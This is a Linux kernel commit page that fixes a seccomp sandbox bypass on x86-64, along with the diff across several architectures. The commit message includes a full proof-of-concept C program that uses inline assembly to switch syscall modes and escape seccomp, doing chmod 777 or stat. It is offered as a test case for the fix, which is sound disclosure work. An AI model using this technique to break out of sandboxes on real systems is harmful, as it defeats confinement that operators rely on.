Linux kernel mirror (for testing) git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
kernel os linux

x86-64: seccomp: fix 32/64 syscall hole

On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call. A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table. The fix is simple: test TS_COMPAT
instead of TIF_IA32. Here is an example exploit:

/* test case for seccomp circumvention on x86-64

There are two failure modes: compile with -m64 or compile with -m32.

The -m64 case is the worst one, because it does "chmod 777 ." (could
be any chmod call). The -m32 case demonstrates it was able to do
stat(), which can glean information but not harm anything directly.

A buggy kernel will let the test do something, print, and exit 1; a
fixed kernel will make it exit with SIGKILL before it does anything.
*/

#define _GNU_SOURCE
#include <assert.h>
#include <inttypes.h>
#include <stdio.h>
#include <linux/prctl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <asm/unistd.h>

int
main (int argc, char **argv)
{
char buf[100];
static const char dot[] = ".";
long ret;
unsigned st[24];

if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

#ifdef __x86_64__
assert ((uintptr_t) dot < (1UL << 32));
asm ("int $0x80 # %0 <- %1(%2 %3)"
: "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
ret = snprintf (buf, sizeof buf,
"result %ld (check mode on .!)\n", ret);
#elif defined __i386__
asm (".code32\n"
"pushl %%cs\n"
"pushl $2f\n"
"ljmpl $0x33, $1f\n"
".code64\n"
"1: syscall # %0 <- %1(%2 %3)\n"
"lretl\n"
".code32\n"
"2:"
: "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
if (ret == 0)
ret = snprintf (buf, sizeof buf,
"stat . -> st_uid=%u\n", st[7]);
else
ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
#else
# error "not this one"
#endif

write (1, buf, ret);

syscall (__NR_exit, 1);
return 2;
}

Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>

authored by

Roland McGrath and committed by
Linus Torvalds
5b101740 ccbe495c

+14 -28
-1
arch/mips/include/asm/seccomp.h
··· 1 1 #ifndef __ASM_SECCOMP_H 2 2 3 - #include <linux/thread_info.h> 4 3 #include <linux/unistd.h> 5 4 6 5 #define __NR_seccomp_read __NR_read
+5
arch/powerpc/include/asm/compat.h
··· 210 210 compat_ulong_t __unused6; 211 211 }; 212 212 213 + static inline int is_compat_task(void) 214 + { 215 + return test_thread_flag(TIF_32BIT); 216 + } 217 + 213 218 #endif /* __KERNEL__ */ 214 219 #endif /* _ASM_POWERPC_COMPAT_H */
-4
arch/powerpc/include/asm/seccomp.h
··· 1 1 #ifndef _ASM_POWERPC_SECCOMP_H 2 2 #define _ASM_POWERPC_SECCOMP_H 3 3 4 - #ifdef __KERNEL__ 5 - #include <linux/thread_info.h> 6 - #endif 7 - 8 4 #include <linux/unistd.h> 9 5 10 6 #define __NR_seccomp_read __NR_read
+5
arch/sparc/include/asm/compat.h
··· 240 240 unsigned int __unused2; 241 241 }; 242 242 243 + static inline int is_compat_task(void) 244 + { 245 + return test_thread_flag(TIF_32BIT); 246 + } 247 + 243 248 #endif /* _ASM_SPARC64_COMPAT_H */
-6
arch/sparc/include/asm/seccomp.h
··· 1 1 #ifndef _ASM_SECCOMP_H 2 2 3 - #include <linux/thread_info.h> /* already defines TIF_32BIT */ 4 - 5 - #ifndef TIF_32BIT 6 - #error "unexpected TIF_32BIT on sparc64" 7 - #endif 8 - 9 3 #include <linux/unistd.h> 10 4 11 5 #define __NR_seccomp_read __NR_read
-6
arch/x86/include/asm/seccomp_32.h
··· 1 1 #ifndef _ASM_X86_SECCOMP_32_H 2 2 #define _ASM_X86_SECCOMP_32_H 3 3 4 - #include <linux/thread_info.h> 5 - 6 - #ifdef TIF_32BIT 7 - #error "unexpected TIF_32BIT on i386" 8 - #endif 9 - 10 4 #include <linux/unistd.h> 11 5 12 6 #define __NR_seccomp_read __NR_read
-8
arch/x86/include/asm/seccomp_64.h
··· 1 1 #ifndef _ASM_X86_SECCOMP_64_H 2 2 #define _ASM_X86_SECCOMP_64_H 3 3 4 - #include <linux/thread_info.h> 5 - 6 - #ifdef TIF_32BIT 7 - #error "unexpected TIF_32BIT on x86_64" 8 - #else 9 - #define TIF_32BIT TIF_IA32 10 - #endif 11 - 12 4 #include <linux/unistd.h> 13 5 #include <asm/ia32_unistd.h> 14 6
+4 -3
kernel/seccomp.c
··· 8 8 9 9 #include <linux/seccomp.h> 10 10 #include <linux/sched.h> 11 + #include <linux/compat.h> 11 12 12 13 /* #define SECCOMP_DEBUG 1 */ 13 14 #define NR_SECCOMP_MODES 1 ··· 23 22 0, /* null terminated */ 24 23 }; 25 24 26 - #ifdef TIF_32BIT 25 + #ifdef CONFIG_COMPAT 27 26 static int mode1_syscalls_32[] = { 28 27 __NR_seccomp_read_32, __NR_seccomp_write_32, __NR_seccomp_exit_32, __NR_seccomp_sigreturn_32, 29 28 0, /* null terminated */ ··· 38 37 switch (mode) { 39 38 case 1: 40 39 syscall = mode1_syscalls; 41 - #ifdef TIF_32BIT 42 - if (test_thread_flag(TIF_32BIT)) 40 + #ifdef CONFIG_COMPAT 41 + if (is_compat_task()) 43 42 syscall = mode1_syscalls_32; 44 43 #endif 45 44 do {